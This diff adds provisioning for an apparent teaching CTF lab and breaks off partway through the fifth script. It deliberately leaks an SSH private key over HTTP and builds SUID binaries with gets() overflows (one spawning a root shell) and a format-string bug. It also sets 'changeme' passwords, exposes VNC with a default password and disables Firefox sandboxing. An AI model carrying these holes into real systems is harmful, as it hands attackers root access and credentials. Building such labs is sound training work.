+  # by making sure your Vagrantfile isn't accessible to the vagrant box.
+  # If you use this you may want to enable additional shared subfolders as
+  # shown above.
+  # config.vm.synced_folder ".", "/vagrant", disabled: true
+
+  # Provider-specific configuration so you can fine-tune various
+  # backing providers for Vagrant. These expose provider-specific options.
+  # Example for VirtualBox:
+  #
+  # config.vm.provider "virtualbox" do |vb|
+  #   # Display the VirtualBox GUI when booting the machine
+  #   vb.gui = true
+  #
+  #   # Customize the amount of memory on the VM:
+    # vb.memory = "1024"
+  # end
+  #
+  # View the documentation for the provider you are using for more
+  # information on available options.
+
+  # Enable provisioning with a shell script. Additional provisioners such as
+  # Ansible, Chef, Docker, Puppet and Salt are also available. Please see the
+  # documentation for more information about their specific syntax and use.
+  # config.vm.provision "shell", inline: <<-SHELL
+  #   apt-get update
+  #   apt-get install -y apache2
+  # SHELL
+  config.vm.provision "shell", path: "p1/provision_p1.sh"
+  config.vm.provision "shell", path: "p2/provision_p2.sh"
+  config.vm.provision "shell", path: "p3/provision_p3.sh"
+  config.vm.provision "shell", path: "p4/provision_p4.sh"
+  config.vm.provision "shell", path: "p5/provision_p5.sh"
+end

--- a/infrastructure/provision/p1/provision_p1.sh
+++ b/infrastructure/provision/p1/provision_p1.sh
@@ -1,0 +1,144 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# P1: Gain Access (info leak -> SSH)
+# Run this as root inside the Ubuntu VM.
+
+# 1) Ensure required packages (quiet, idempotent)
+# Do not run apt update/upgrade as requested.
+export DEBIAN_FRONTEND=noninteractive
+apt -y -qq install openssh-server nginx >/dev/null || true
+
+# 2) Create user p1 if not exists
+if ! id -u p1 >/dev/null 2>&1; then
+  useradd -m -s /bin/bash p1
+  echo "p1:changeme" | chpasswd
+fi
+
+# 3) Generate SSH key pair for p1 (no passphrase)
+install -d -m 700 -o p1 -g p1 /home/p1/.ssh
+if [[ ! -f /home/p1/.ssh/id_rsa ]]; then
+  sudo -u p1 ssh-keygen -t rsa -b 2048 -f /home/p1/.ssh/id_rsa -N ""
+fi
+
+# 4) Add public key to authorized_keys
+if ! grep -qF "$(cat /home/p1/.ssh/id_rsa.pub)" /home/p1/.ssh/authorized_keys 2>/dev/null; then
+  sudo -u p1 bash -c 'cat /home/p1/.ssh/id_rsa.pub >> /home/p1/.ssh/authorized_keys'
+fi
+chmod 600 /home/p1/.ssh/authorized_keys
+chown p1:p1 /home/p1/.ssh/authorized_keys
+
+# 5) Leak private key via web server (misconfiguration)
+mkdir -p /var/www/html/backup
+cp /home/p1/.ssh/id_rsa /var/www/html/backup/id_rsa
+chmod 644 /var/www/html/backup/id_rsa
+
+# 5b) Add decoy web directory with fake keys
+mkdir -p /var/www/html/old_keys
+if [[ ! -f /var/www/html/old_keys/id_rsa.old ]]; then
+  ssh-keygen -t rsa -b 2048 -f /var/www/html/old_keys/id_rsa.old -N "" >/dev/null
+fi
+chmod 644 /var/www/html/old_keys/id_rsa.old
+chmod 644 /var/www/html/old_keys/id_rsa.old.pub
+
+# 5c) Add robots.txt hint for discovery
+cat > /var/www/html/robots.txt <<'TXT'
+User-agent: *
+Disallow: /backup/
+Disallow: /old_keys/
+TXT
+chmod 644 /var/www/html/robots.txt
+
+# 6) Start nginx
+systemctl enable nginx
+systemctl restart nginx
+
+# 7) Start ssh
+systemctl enable ssh
+systemctl restart ssh
+
+# 8) Per-boot key and P1 flag generation
+mkdir -p /opt/ctf
+cat > /opt/ctf/boot-keygen.sh <<'SH'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Derive P1 flag using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+
+# Write P1 flag to protected location
+install -d -m 700 -o p1 -g p1 /home/p1/flags
+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+SH
+
+chmod 750 /opt/ctf/boot-keygen.sh
+chown root:root /opt/ctf/boot-keygen.sh
+
+cat > /etc/systemd/system/ctf-bootkey.service <<'UNIT'
+[Unit]
+Description=CTF per-boot key and P1 flag generator
+After=network.target
+
+[Service]
+Type=oneshot
+ExecStart=/opt/ctf/boot-keygen.sh
+
+[Install]
+WantedBy=multi-user.target
+UNIT
+
+systemctl enable ctf-bootkey.service
+systemctl start ctf-bootkey.service
+
+# 9) Extraction helper (P1 only)
+cat > /usr/local/bin/ctf-extract <<'SH'
+#!/usr/bin/env bash
+set -euo pipefail
+
+KEY_FILE=/home/p1/.keys/boot.key
+FLAG_PATH=/home/p1/flags/flag_p1.txt
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+if [[ ! -r "$FLAG_PATH" ]]; then
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+cat > flag.txt <<EOF
+$(cat "$FLAG_PATH")
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+SH
+
+chmod 755 /usr/local/bin/ctf-extract
+chown root:root /usr/local/bin/ctf-extract
+
+# 8) MOTD hint (short, subtle)
+MOTD_FILE=/etc/motd
+HINT="Tip: check what the web server might be sharing that it shouldn't."
+if ! grep -qF "$HINT" "$MOTD_FILE" 2>/dev/null; then
+  echo "$HINT" >> "$MOTD_FILE"
+fi
+
+echo "P1 provisioned. Leaked key at /backup/id_rsa over HTTP."

--- a/infrastructure/provision/p2/p2.c
+++ b/infrastructure/provision/p2/p2.c
@@ -1,0 +1,21 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+static void win(void) {
+    setuid(0);
+    setgid(0);
+    system("/bin/sh");
+}
+
+static void vuln(void) {
+    char buf[64];
+    puts("Enter input:");
+    gets(buf);
+}
+
+int main(void) {
+    vuln();
+    return 0;
+}

--- a/infrastructure/provision/p2/provision_p2.sh
+++ b/infrastructure/provision/p2/provision_p2.sh
@@ -1,0 +1,127 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# P2: Privilege Escalation via SUID-root buffer overflow
+# Run this as root inside the Ubuntu VM.
+
+# 1) Ensure build toolchain exists (no updates)
+if ! command -v gcc >/dev/null 2>&1; then
+  echo "[!] gcc not found. Install build-essential before running this script."
+  exit 1
+fi
+
+# 2) Create target directory
+mkdir -p /home/p1/p2
+chown -R p1:p1 /home/p1/p2
+
+# 3) Install vulnerable source
+cat > /home/p1/p2/p2.c <<'SRC'
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+static void win(void) {
+    setuid(0);
+    setgid(0);
+    system("/bin/sh");
+}
+
+static void vuln(void) {
+    char buf[64];
+    puts("Enter input:");
+    gets(buf);
+}
+
+int main(void) {
+    vuln();
+    return 0;
+}
+SRC
+
+# 4) Compile with protections disabled (classic overflow)
+gcc -fno-stack-protector -z execstack -no-pie -o /home/p1/p2/p2 /home/p1/p2/p2.c
+
+# 5) Make SUID-root
+chown root:root /home/p1/p2/p2
+chmod 4755 /home/p1/p2/p2
+
+# 5b) Remove source so students only see the binary
+rm -f /home/p1/p2/p2.c
+
+# 6) Extend per-boot flag generator to include P2
+if [[ -f /opt/ctf/boot-keygen.sh ]]; then
+  cat > /opt/ctf/boot-keygen.sh <<'BOOT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Derive flags using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P2=$(printf '%s' "P2:$KEY" | sha256sum | awk '{print $1}')
+
+# Write P1 flag
+install -d -m 700 -o p1 -g p1 /home/p1/flags
+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+
+# Write P2 flag
+printf '%s\n' "$FLAG_P2" > /root/flag_p2.txt
+chmod 600 /root/flag_p2.txt
+BOOT
+  chmod 750 /opt/ctf/boot-keygen.sh
+  chown root:root /opt/ctf/boot-keygen.sh
+  systemctl restart ctf-bootkey.service || true
+fi
+
+# 7) Extend ctf-extract to support P1/P2 and key.txt
+if [[ -f /usr/local/bin/ctf-extract ]]; then
+  cat > /usr/local/bin/ctf-extract <<'EXTRACT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+PROBLEM=${1:-P1}
+KEY_FILE=/home/p1/.keys/boot.key
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+FLAG_PATH=""
+case "$PROBLEM" in
+  P1) FLAG_PATH=/home/p1/flags/flag_p1.txt ;;
+  P2) FLAG_PATH=/root/flag_p2.txt ;;
+  *) echo "Usage: ctf-extract P1|P2"; exit 1 ;;
+esac
+
+if [[ ! -r "$FLAG_PATH" ]]; then
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+cat > flag.txt <<EOF
+$(cat "$FLAG_PATH")
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+EXTRACT
+  chmod 755 /usr/local/bin/ctf-extract
+  chown root:root /usr/local/bin/ctf-extract
+fi
+
+echo "P2 provisioned. SUID binary at /home/p1/p2/p2"

--- a/infrastructure/provision/p3/p3.c
+++ b/infrastructure/provision/p3/p3.c
@@ -1,0 +1,40 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void mark_solved(void) {
+    FILE *f = fopen("/opt/p3/solved", "w");
+    if (f) {
+        fputs("ok\n", f);
+        fclose(f);
+    }
+}
+
+static void win(void) {
+    FILE *f = fopen("/opt/p3/flag_p3.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+
+    char flag[128];
+    if (fgets(flag, sizeof(flag), f) != NULL) {
+        printf("FLAG: %s\n", flag);
+    } else {
+        puts("No flag");
+    }
+    fclose(f);
+    mark_solved();
+    exit(0);
+}
+
+static void vuln(void) {
+    char buf[64];
+    puts("Say something:");
+    gets(buf);
+}
+
+int main(void) {
+    vuln();
+    return 0;
+}

--- a/infrastructure/provision/p3/provision_p3.sh
+++ b/infrastructure/provision/p3/provision_p3.sh
@@ -1,0 +1,178 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# P3: Control-flow hijacking (NX, ret2win)
+# Run this as root inside the Ubuntu VM.
+
+# 1) Ensure build toolchain exists (no updates)
+if ! command -v gcc >/dev/null 2>&1; then
+  echo "[!] gcc not found. Install build-essential before running this script."
+  exit 1
+fi
+
+# 2) Ensure p3flag user exists
+if ! id -u p3flag >/dev/null 2>&1; then
+  useradd -m -s /bin/bash p3flag
+  echo "p3flag:changeme" | chpasswd
+fi
+
+# 3) Create target directory
+mkdir -p /home/p1/p3
+chown -R p1:p1 /home/p1/p3
+mkdir -p /opt/p3
+chown -R p3flag:p3flag /opt/p3
+chmod 755 /opt/p3
+
+# 4) Install vulnerable source
+cat > /home/p1/p3/p3.c <<'SRC'
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void mark_solved(void) {
+    FILE *f = fopen("/opt/p3/solved", "w");
+    if (f) {
+        fputs("ok\n", f);
+        fclose(f);
+    }
+}
+
+static void win(void) {
+    FILE *f = fopen("/opt/p3/flag_p3.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+
+    char flag[128];
+    if (fgets(flag, sizeof(flag), f) != NULL) {
+        printf("FLAG: %s\n", flag);
+    } else {
+        puts("No flag");
+    }
+    fclose(f);
+    mark_solved();
+    exit(0);
+}
+
+static void vuln(void) {
+    char buf[64];
+    puts("Say something:");
+    gets(buf);
+}
+
+int main(void) {
+    vuln();
+    return 0;
+}
+SRC
+
+# 5) Compile with NX enabled (no execstack), no PIE, no canary
+gcc -fno-stack-protector -no-pie -z noexecstack -o /home/p1/p3/p3 /home/p1/p3/p3.c
+
+# 6) Make SUID to p3flag
+chown p3flag:p3flag /home/p1/p3/p3
+chmod 4755 /home/p1/p3/p3
+
+# 6b) Remove source so students only see the binary
+rm -f /home/p1/p3/p3.c
+
+# 7) Extend per-boot flag generator to include P3
+if [[ -f /opt/ctf/boot-keygen.sh ]]; then
+  cat > /opt/ctf/boot-keygen.sh <<'BOOT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Clear per-boot solved markers
+rm -f /opt/p3/solved /opt/p4/solved /opt/p5/solved 2>/dev/null || true
+
+# Derive flags using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P2=$(printf '%s' "P2:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P3=$(printf '%s' "P3:$KEY" | sha256sum | awk '{print $1}')
+
+# Write P1 flag
+install -d -m 700 -o p1 -g p1 /home/p1/flags
+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+
+# Write P2 flag
+printf '%s\n' "$FLAG_P2" > /root/flag_p2.txt
+chmod 600 /root/flag_p2.txt
+
+# Write P3 flag
+install -d -m 755 -o p3flag -g p3flag /opt/p3
+printf '%s\n' "$FLAG_P3" > /opt/p3/flag_p3.txt
+chown p3flag:p3flag /opt/p3/flag_p3.txt
+chmod 600 /opt/p3/flag_p3.txt
+BOOT
+  chmod 750 /opt/ctf/boot-keygen.sh
+  chown root:root /opt/ctf/boot-keygen.sh
+  systemctl restart ctf-bootkey.service || true
+fi
+
+# 8) Extend ctf-extract to support P1/P2/P3 and key.txt
+if [[ -f /usr/local/bin/ctf-extract ]]; then
+  cat > /usr/local/bin/ctf-extract <<'EXTRACT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+PROBLEM=${1:-P1}
+KEY_FILE=/home/p1/.keys/boot.key
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+FLAG_PATH=""
+NEED_SOLVED=""
+COMPUTE_FLAG="0"
+case "$PROBLEM" in
+  P1) FLAG_PATH=/home/p1/flags/flag_p1.txt ;;
+  P2) FLAG_PATH=/root/flag_p2.txt ;;
+  P3) NEED_SOLVED=/opt/p3/solved; COMPUTE_FLAG="1" ;;
+  *) echo "Usage: ctf-extract P1|P2|P3"; exit 1 ;;
+esac
+
+if [[ -n "$NEED_SOLVED" ]] && [[ ! -r "$NEED_SOLVED" ]]; then
+  echo "[!] P3 not solved yet. Exploit the P3 binary first."
+  exit 1
+fi
+
+if [[ "$COMPUTE_FLAG" == "1" ]]; then
+  FLAG=$(printf '%s' "P3:$KEY" | sha256sum | awk '{print $1}')
+elif [[ -r "$FLAG_PATH" ]]; then
+  FLAG=$(cat "$FLAG_PATH")
+else
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+cat > flag.txt <<EOF
+$FLAG
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+EXTRACT
+  chmod 755 /usr/local/bin/ctf-extract
+  chown root:root /usr/local/bin/ctf-extract
+fi
+
+pip install pwn >/dev/null 2>&1
+echo "P3 provisioned. SUID binary at /home/p1/p3/p3"

--- a/infrastructure/provision/p4/p4.c
+++ b/infrastructure/provision/p4/p4.c
@@ -1,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void win(void) {
+    FILE *f = fopen("/opt/p4/flag_p4.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+    char flag[128];
+    if (fgets(flag, sizeof(flag), f) != NULL) {
+        printf("FLAG: %s\n", flag);
+    } else {
+        puts("No flag");
+    }
+    fclose(f);
+    FILE *s = fopen("/opt/p4/solved", "w");
+    if (s) {
+        fputs("ok\n", s);
+        fclose(s);
+    }
+    exit(0);
+}
+
+static void safe(void) {
+    puts("Nope.");
+}
+
+static void (*fp)(void) = safe;
+
+static void vuln(void) {
+    char buf[128];
+    int auth = 0;
+    int dummy = 0;
+    puts("Input:");
+    if (!fgets(buf, sizeof(buf), stdin)) {
+        return;
+    }
+    printf(buf, &auth, dummy);
+    if (auth == 0x1337) {
+        fp = win;
+    }
+    fp();
+}
+
+int main(void) {
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+    setgid(getegid());
+    setuid(geteuid());
+    vuln();
+    return 0;
+}

--- a/infrastructure/provision/p4/provision_p4.sh
+++ b/infrastructure/provision/p4/provision_p4.sh
@@ -1,0 +1,200 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# P4: Format-string vulnerability
+# Run this as root inside the Ubuntu VM.
+
+# 1) Ensure build toolchain exists (no updates)
+if ! command -v gcc >/dev/null 2>&1; then
+  echo "[!] gcc not found. Install build-essential before running this script."
+  exit 1
+fi
+
+# 2) Ensure p4flag user exists
+if ! id -u p4flag >/dev/null 2>&1; then
+  useradd -m -s /bin/bash p4flag
+  echo "p4flag:changeme" | chpasswd
+fi
+
+# 3) Create target directories
+mkdir -p /home/p1/p4
+chown -R p1:p1 /home/p1/p4
+mkdir -p /opt/p4
+chown -R p4flag:p4flag /opt/p4
+chmod 755 /opt/p4
+
+# 4) Install vulnerable source
+cat > /home/p1/p4/p4.c <<'SRC'
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void win(void) {
+    FILE *f = fopen("/opt/p4/flag_p4.txt", "r");
+    if (!f) {
+        puts("No flag");
+        exit(1);
+    }
+    char flag[128];
+    if (fgets(flag, sizeof(flag), f) != NULL) {
+        printf("FLAG: %s\n", flag);
+    } else {
+        puts("No flag");
+    }
+    fclose(f);
+    FILE *s = fopen("/opt/p4/solved", "w");
+    if (s) {
+        fputs("ok\n", s);
+        fclose(s);
+    }
+    exit(0);
+}
+
+static void safe(void) {
+    puts("Nope.");
+}
+
+static void (*fp)(void) = safe;
+
+static void vuln(void) {
+    char buf[128];
+    int auth = 0;
+    int dummy = 0;
+    puts("Input:");
+    if (!fgets(buf, sizeof(buf), stdin)) {
+        return;
+    }
+    printf(buf, &auth, dummy);
+    if (auth == 0x1337) {
+        fp = win;
+    }
+    fp();
+}
+
+int main(void) {
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+    setgid(getegid());
+    setuid(geteuid());
+    vuln();
+    return 0;
+}
+SRC
+
+# 5) Compile with NX enabled, no PIE, no canary
+gcc -fno-stack-protector -no-pie -z noexecstack -o /home/p1/p4/p4 /home/p1/p4/p4.c
+
+# 6) Make SUID to p4flag
+chown p4flag:p4flag /home/p1/p4/p4
+chmod 4755 /home/p1/p4/p4
+
+# 6b) Remove source so students only see the binary
+rm -f /home/p1/p4/p4.c
+
+# 7) Extend per-boot flag generator to include P4
+if [[ -f /opt/ctf/boot-keygen.sh ]]; then
+  cat > /opt/ctf/boot-keygen.sh <<'BOOT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Clear per-boot solved markers
+rm -f /opt/p3/solved /opt/p4/solved /opt/p5/solved 2>/dev/null || true
+
+# Derive flags using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P2=$(printf '%s' "P2:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P3=$(printf '%s' "P3:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P4=$(printf '%s' "P4:$KEY" | sha256sum | awk '{print $1}')
+
+# Write P1 flag
+install -d -m 700 -o p1 -g p1 /home/p1/flags
+printf '%s\n' "$FLAG_P1" > /home/p1/flags/flag_p1.txt
+chown p1:p1 /home/p1/flags/flag_p1.txt
+chmod 600 /home/p1/flags/flag_p1.txt
+
+# Write P2 flag
+printf '%s\n' "$FLAG_P2" > /root/flag_p2.txt
+chmod 600 /root/flag_p2.txt
+
+# Write P3 flag
+install -d -m 755 -o p3flag -g p3flag /opt/p3
+printf '%s\n' "$FLAG_P3" > /opt/p3/flag_p3.txt
+chown p3flag:p3flag /opt/p3/flag_p3.txt
+chmod 600 /opt/p3/flag_p3.txt
+
+# Write P4 flag
+install -d -m 755 -o p4flag -g p4flag /opt/p4
+printf '%s\n' "$FLAG_P4" > /opt/p4/flag_p4.txt
+chown p4flag:p4flag /opt/p4/flag_p4.txt
+chmod 600 /opt/p4/flag_p4.txt
+BOOT
+  chmod 750 /opt/ctf/boot-keygen.sh
+  chown root:root /opt/ctf/boot-keygen.sh
+  systemctl restart ctf-bootkey.service || true
+fi
+
+# 8) Extend ctf-extract to support P1/P2/P3/P4 and key.txt
+if [[ -f /usr/local/bin/ctf-extract ]]; then
+  cat > /usr/local/bin/ctf-extract <<'EXTRACT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+PROBLEM=${1:-P1}
+KEY_FILE=/home/p1/.keys/boot.key
+
+if [[ ! -r "$KEY_FILE" ]]; then
+  echo "[!] Cannot read key file. You need P1 access."
+  exit 1
+fi
+
+KEY=$(cat "$KEY_FILE")
+
+FLAG_PATH=""
+NEED_SOLVED=""
+COMPUTE_FLAG="0"
+COMPUTE_TAG=""
+case "$PROBLEM" in
+  P1) FLAG_PATH=/home/p1/flags/flag_p1.txt ;;
+  P2) FLAG_PATH=/root/flag_p2.txt ;;
+  P3) NEED_SOLVED=/opt/p3/solved; COMPUTE_FLAG="1"; COMPUTE_TAG="P3" ;;
+  P4) NEED_SOLVED=/opt/p4/solved; COMPUTE_FLAG="1"; COMPUTE_TAG="P4" ;;
+  *) echo "Usage: ctf-extract P1|P2|P3|P4"; exit 1 ;;
+esac
+
+if [[ -n "$NEED_SOLVED" ]] && [[ ! -r "$NEED_SOLVED" ]]; then
+  echo "[!] ${PROBLEM} not solved yet. Exploit the ${PROBLEM} binary first."
+  exit 1
+fi
+
+if [[ "$COMPUTE_FLAG" == "1" ]]; then
+  FLAG=$(printf '%s' "${COMPUTE_TAG}:${KEY}" | sha256sum | awk '{print $1}')
+elif [[ -r "$FLAG_PATH" ]]; then
+  FLAG=$(cat "$FLAG_PATH")
+else
+  echo "[!] Cannot read flag. You do not yet have required access."
+  exit 1
+fi
+
+cat > flag.txt <<EOF
+$FLAG
+EOF
+
+cat > key.txt <<EOF
+$KEY
+EOF
+
+echo "Wrote flag.txt, key.txt"
+EXTRACT
+  chmod 755 /usr/local/bin/ctf-extract
+  chown root:root /usr/local/bin/ctf-extract
+fi
+
+echo "P4 provisioned. SUID binary at /home/p1/p4/p4"

--- a/infrastructure/provision/p5/provision_p5.sh
+++ b/infrastructure/provision/p5/provision_p5.sh
@@ -1,0 +1,247 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# P5: CSS hijacking with local Firefox over VNC
+# Run this as root inside the Ubuntu VM.
+
+# 1) Ensure required packages exist (no updates)
+# NOTE: Install step is intentionally disabled. Packages are preinstalled in the VM.
+# export DEBIAN_FRONTEND=noninteractive
+# export NEEDRESTART_MODE=a
+# echo "[P5] Installing desktop/VNC packages (may take a few minutes)..."
+# timeout 1200 apt -y -qq install \
+#   -o Dpkg::Options::=--force-confdef \
+#   -o Dpkg::Options::=--force-confold \
+#   -o Acquire::Retries=3 \
+#   -o Acquire::http::Timeout=20 \
+#   -o Acquire::https::Timeout=20 \
+#   python3 python3-venv python3-pip \
+#   xfce4 xfce4-goodies tigervnc-standalone-server tigervnc-common \
+#   firefox dbus-x11 xterm || true
+
+# 2) Ensure ctfadmin exists
+if ! id -u ctfadmin >/dev/null 2>&1; then
+  sudo useradd -m -s /bin/bash ctfadmin
+  echo "ctfadmin:changeme" | chpasswd
+fi
+# Ensure ctfadmin is not a sudo user (no supplemental groups beyond its own)
+usermod -G ctfadmin ctfadmin
+
+# 3) Create P5 directories
+mkdir -p /opt/p5
+chown -R ctfadmin:ctfadmin /opt/p5
+chmod 755 /opt/p5
+
+# 4) Install server
+install -m 755 -o root -g root /vagrant/p5/server.py /opt/p5/server.py
+
+# 5) Create CSS file placeholder
+if [[ ! -f /opt/p5/user.css ]]; then
+  echo "/* submit CSS to reveal the flag */" > /opt/p5/user.css
+fi
+chown ctfadmin:ctfadmin /opt/p5/user.css
+chmod 644 /opt/p5/user.css
+
+# Browser note: use epiphany-browser inside VNC (preinstalled in the VM).
+
+# 6) Systemd service for P5 server
+cat > /etc/systemd/system/p5-server.service <<'UNIT'
+[Unit]
+Description=P5 CSS Challenge Server
+After=network.target
+
+[Service]
+Type=simple
+User=ctfadmin
+WorkingDirectory=/opt/p5
+ExecStart=/usr/bin/python3 /opt/p5/server.py
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+UNIT
+
+systemctl enable p5-server.service
+timeout 15 systemctl restart p5-server.service || true
+
+# 7) VNC setup for ctfadmin
+install -d -m 700 -o ctfadmin -g ctfadmin /home/ctfadmin/.vnc
+CTFADMIN_UID=$(id -u ctfadmin)
+install -d -m 700 -o ctfadmin -g ctfadmin "/run/user/${CTFADMIN_UID}"
+
+# VNC password (default: ctfadmin)
+if [[ ! -f /home/ctfadmin/.vnc/passwd ]]; then
+  printf "ctfadmin\n" | /usr/bin/vncpasswd -f > /home/ctfadmin/.vnc/passwd || true
+fi
+chown ctfadmin:ctfadmin /home/ctfadmin/.vnc/passwd
+chmod 600 /home/ctfadmin/.vnc/passwd
+
+# Xfce startup
+touch /home/ctfadmin/.Xresources
+chown ctfadmin:ctfadmin /home/ctfadmin/.Xresources
+cat > /home/ctfadmin/.vnc/xstartup <<'XSTART'
+#!/bin/sh
+unset SESSION_MANAGER
+unset DBUS_SESSION_BUS_ADDRESS
+export XDG_RUNTIME_DIR="/run/user/$(id -u)"
+if [ ! -d "$XDG_RUNTIME_DIR" ]; then
+  mkdir -p "$XDG_RUNTIME_DIR"
+  chmod 700 "$XDG_RUNTIME_DIR"
+fi
+if [ -f "$HOME/.Xresources" ]; then
+  xrdb "$HOME/.Xresources"
+fi
+exec dbus-launch --exit-with-session startxfce4
+XSTART
+chmod 755 /home/ctfadmin/.vnc/xstartup
+chown ctfadmin:ctfadmin /home/ctfadmin/.vnc/xstartup
+
+# 8) Systemd service for VNC
+cat > /etc/systemd/system/vncserver@.service <<'UNIT'
+[Unit]
+Description=VNC Server for %i
+After=network.target
+
+[Service]
+Type=simple
+User=ctfadmin
+Group=ctfadmin
+WorkingDirectory=/home/ctfadmin
+ExecStart=/usr/bin/vncserver :%i -localhost no -geometry 1280x800 -depth 24 -fg
+ExecStop=/usr/bin/vncserver -kill :%i
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+UNIT
+
+systemctl daemon-reload
+systemctl enable vncserver@1.service
+timeout 15 systemctl restart vncserver@1.service || true
+
+# 8b) Firefox wrapper for VNC sessions (avoids sandbox/memlock issues)
+cat > /usr/local/bin/firefox-vnc <<'FF'
+#!/usr/bin/env bash
+set -euo pipefail
+export MOZ_DISABLE_CONTENT_SANDBOX=1
+export MOZ_DISABLE_GMP_SANDBOX=1
+export MOZ_DISABLE_GPU_SANDBOX=1
+exec /usr/bin/firefox -no-remote -profile /tmp/ff-vnc "$@"
+FF
+chmod 755 /usr/local/bin/firefox-vnc
+
+# 9) Extend per-boot flag generator to include P5
+if [[ -f /opt/ctf/boot-keygen.sh ]]; then
+  cat > /opt/ctf/boot-keygen.sh <<'BOOT'
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Generate per-boot key for P1 user
+install -d -m 700 -o p1 -g p1 /home/p1/.keys
+KEY_FILE=/home/p1/.keys/boot.key
+head -c 32 /dev/urandom | base64 > "$KEY_FILE"
+chown p1:p1 "$KEY_FILE"
+chmod 600 "$KEY_FILE"
+
+# Clear per-boot solved markers
+rm -f /opt/p3/solved /opt/p4/solved /opt/p5/solved 2>/dev/null || true
+
+# Derive flags using the per-boot key
+KEY=$(cat "$KEY_FILE")
+FLAG_P1=$(printf '%s' "P1:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P2=$(printf '%s' "P2:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P3=$(printf '%s' "P3:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P4=$(printf '%s' "P4:$KEY" | sha256sum | awk '{print $1}')
+FLAG_P5=$(printf '%s' "P5:$KEY" | sha256sum | awk '{print $1}')
+
+# Write P1 flag
+install -d -m 700 -o p1 -g p1 /home/p1/flags
